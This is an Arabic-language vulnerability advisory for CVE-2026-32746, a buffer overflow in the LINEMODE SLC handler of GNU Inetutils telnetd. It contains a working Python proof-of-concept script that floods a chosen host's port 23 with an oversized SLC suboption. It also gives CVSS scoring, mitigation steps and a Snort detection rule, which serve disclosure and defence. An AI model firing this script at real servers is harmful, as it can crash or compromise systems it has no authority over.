
إثبات مفهوم لاستغلال CVE-2026-32746، وهي ثغرة حرجة في تنفيذ التعليمات البرمجية عن بُعد في GNU Inetutils telnetd عبر تجاوز سعة المخزن المؤقت في LINEMODE SLC. يتضمن تحليلًا فنيًا ومقاييس CVSS وإرشادات التخفيف.
ثغرة حرجة | CVSS 9.8 | تنفيذ عن بُعد للكود!
تتأثر: GNU Inetutils Telnetd (الإصدارات السابقة لـ 2.7)
النوع: كتابة خارج الحدود (OOB Write) في معالج الخيارات الفرعية LINEMODE SLC
ناقل الهجوم: الشبكة (المنفذ 23) | لا يتطلب مصادقة
التأثير: تنفيذ عن بُعد للكود بصلاحيات عملية Telnetd
تم تحديد تجاوز سعة المخزن المؤقت بسبب كتابة خارج الحدود (OOB Write) في الدالة add_slc في خدمة telnetd الخاصة بـ GNU Inetutils. يسمح هذا الخلل للمهاجم عن بُعد بـ حقن كود تعسفي من خلال التلاعب بـ الخيارات الفرعية SLC (Set Local Characters) في بروتوكول Telnet.
add_slc (معالجة الأحرف المحلية).يمكن للمهاجم استغلال هذه الثغرة عبر حمولة Telnet خبيثة تُشبع المخزن المؤقت الداخلي:
#!/usr/bin/env python3
import socket
import sys
# CVE-2026-32746 - LINEMODE SLC Overflow
# IAC SB LINEMODE SLC <list> IAC SE
IAC = b'\xff'
SB = b'\xfa'
SE = b'\xf0'
LINEMODE = b'\x22'
SLC = b'\x03'
target = sys.argv[1] if len(sys.argv) > 1 else "127.0.0.1"
# Payload generado para desbordar add_slc
malicious_slc = b"\x01\x03\x41" * 600 # Repetición de 600 veces
payload = IAC + SB + LINEMODE + SLC + malicious_slc + IAC + SE
print(f"[*] Enviando payload malicioso a {target}...")
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
s.connect((target, 23))
s.sendall(payload)
print("[+] Payload entregado. Verificando caída del servicio/RCE...")
⚠️ تحذير! هذا الكود لأغراض تعليمية وبحثية فقط. استخدامه على أنظمة دون إذن غير قانوني.
| المقياس | القيمة | الوصف |
|---|---|---|
| المتجه | AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H | عن بُعد، دون مصادقة |
| الدرجة | 9.8 (حرج) 🔴 | تأثير عالٍ على السرية والنزاهة والتوافر |
| النشر | 13 مارس 2026 | آخر تعديل: 5 مايو 2026 |
✅ تحديث GNU Inetutils إلى الإصدار المصحح (ما بعد 2.7).
🔹 تعطيل telnetd والانتقال إلى SSH (موصى به).
🔹 حظر المنفذ 23 في جدران الحماية الطرفية.
🔹 تكوين IDS/IPS لاكتشاف تسلسلات LINEMODE SLC الشاذة.
alert tcp any any -> any 23 (msg:"CVE-2026-32746 - LINEMODE SLC Overflow"; content:"|FF FA 22 03|"; depth:5; threshold:type both, track by_src, count 1, seconds 1; sid:1000001; rev:1;)